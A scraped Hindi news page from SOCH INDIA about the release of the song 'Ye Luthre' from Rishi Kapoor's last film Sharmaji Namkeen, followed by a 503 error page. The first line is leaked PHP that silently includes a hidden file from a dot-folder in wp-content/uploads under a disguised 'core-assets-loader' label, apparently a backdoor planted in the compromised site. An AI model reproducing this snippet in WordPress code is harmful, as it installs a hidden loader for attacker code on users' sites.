add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); New Song Release: शर्माजी नमकीन का नया गाना ‘ये लुथरे’ रिलीज, मजेदार अंदाज में दिखे ऋषि कपूर-परेश रावल – SOCH INDIA
Menu

New Song Release: शर्माजी नमकीन का नया गाना ‘ये लुथरे’ रिलीज, मजेदार अंदाज में दिखे ऋषि कपूर-परेश रावल

nobanner

दिवंगत अभिनेता ऋषि कपूर की आखिरी फिल्म शर्माजी नमकीन का पहला गाना ‘ये लुथरे’ रिलाज हो गया है। गाने को जी म्यूजिक कंपनी ने लॉन्च किया है। इस गाने में शर्माजी के रिटायरमेंट के बाद के संघर्ष को बड़े ही रोचक अंदाज में फिल्माया गया है। गाने में परेश रावल और ऋषि कपूर ने अपनी एक्टिंग से जान फूंक दी है। 2.15 सेकेंड का यह गाना लोगों का काफी पसंद आ रहा है।

फिल्म का ट्रेलर आया दर्शकों को पसंद
हाल ही में शर्माजी नमकीन का ट्रेलर रिलीज किया गया था। इस ट्रेलर को लोगों ने काफी पसंद किया था। अपने पसंदीदा एक्टर को देखकर फैंस काफी भावुक हो गए थे। उनके फैंस काफी समय से उन्हें देखने का बेसब्री से इंतजार कर रहे हैं। बता दें कि यह फिल्म ओटीटी प्लेटफॉर्म पर रिलीज की जाएगी। इस फिल्म को अमेजन प्राइम पर 31 मार्च से देखा जा सकता है।
पहली बार एक किरदार को निभा रहे दो अभिनेता
शर्माजी नमकीन फिल्म ऋषि कपूर के दिल के बहुत करीब थी। इस फिल्म को वह किसी भी तरह पूरा करना चाहते थे, लेकिन कैंसर की वजह से उनका निधन हो गया और यह फिल्म अधूरी रह गई। फिल्म को पूरा करना मेकर्स के लिए बड़ी चुनौती थी। इसके बाद परेश रावल इस फिल्म को करने के लिए तैयार हो गए। हिंदी सिनेमा के इतिहास में पहली बार ऐसा होगा जब किसी फिल्म में एक ही किरदार को दो एक्टर्स निभाते नजर आएंगे।
503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.